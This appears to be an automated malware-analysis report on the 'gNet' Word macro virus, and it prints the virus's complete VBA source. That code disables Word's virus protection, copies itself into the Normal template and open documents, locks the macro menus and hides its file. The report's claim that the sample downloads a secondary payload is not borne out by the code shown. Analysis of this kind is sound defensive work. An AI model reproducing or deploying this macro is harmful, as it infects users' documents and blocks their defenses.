gNet — Office (OLE) malware analysis

Static analysis result for SHA-256 2b1cedbfc4852e34…

MALICIOUS

Office (OLE)

Size: 30.0 KB
Created: 2000-04-21 16:00:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-17
MD5: 57347520bfc744adf73eab1116cfcd90
SHA-1: 1ae5a4c11be13664b243b41b2b2430eb977cf281
SHA-256: 2b1cedbfc4852e344ae072f1c250e6ed84735b386b9860fa0fa8b21b82b1bc53
Risk Score: 200

Malware Insights

gNet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document with VBA macros, identified as the 'gNet' macro virus. The macros contain a Shell() call to execute 'attrib +h gnet.vxd', indicating an attempt to hide a downloaded payload. The script also attempts to export itself to 'c:\gnet.vxd' and potentially establish persistence, suggesting it acts as a downloader for a secondary malicious artifact.

Heuristics 3

  • ClamAV: Doc.Trojan.VMPCK1-12 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.VMPCK1-12
  • VBA macros detected · medium · 1 related finding · OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA · critical · OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script: Shell "attrib +h gnet.vxd", vbHide

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2195 bytes
SHA-256: 58ca35c34c3482540bba9b184f8c5625a96abc0083fa77db4f2c804b0d607bad
Detection
ClamAV: Doc.Trojan.VMPCK1-12
Obfuscation or payload: unlikely
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "gnet"
' This is gNet Macro Virus
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate

'

'     WM97.gNet
' ---------------------
' (c) by KSG [ AMACC ]
' ---------------------
'   [ Astig Matizm ]
'
    
Sub gnet()
On Error Resume Next
Set a = NormalTemplate: Set b = a.VBProect
Set c = b.VBComponents(1): Set d = c.Item
Set vp = Options.VirusProtection
Options.ConfirmConversions = False
vp = (Rnd * 0)
Options.SaveNormalPrompt = (Rnd * 0)
b.VBComponents("gnet").Export "c:\gnet.vxd"
ActiveDocument.ReadOnlyRecommended = False
If d("gnet").Name <> "gnet" Then
NotYet = True
If ActiveDocument.VBProject.VBComponents.Item("gnet").Name <> "gnet" Then Still = True
If NotYet = True And Still = False Then Set Blink1 = NormalTemplate.VBProject.VBComponents
If NotYet = False And Still = True Then Set Blink1 = ActiveDocument.VBProject.VBComponents
Blink1.import "c:\gnet.vxd"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If Still = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
CommandBars("tools").Controls("Macro").Enabled = False
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
Shell "attrib +h gnet.vxd", vbHide
End Sub

Sub AutoExec()
    On Error Resume Next
    If Day(Now()) = 10 And Month(Now()) = 9 Then
Call HelpAbout
End If
Call gnet
End Sub

Sub HelpAbout()
    On Error Resume Next
    Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "g N e t , 2 1 , k s g"
.Heading = "gNeT [ ksg / astigmatiZm ]"
.Animation = msoAnimationSearching
.Show
End With
Assistant.Visible = False
Call gnet
End Sub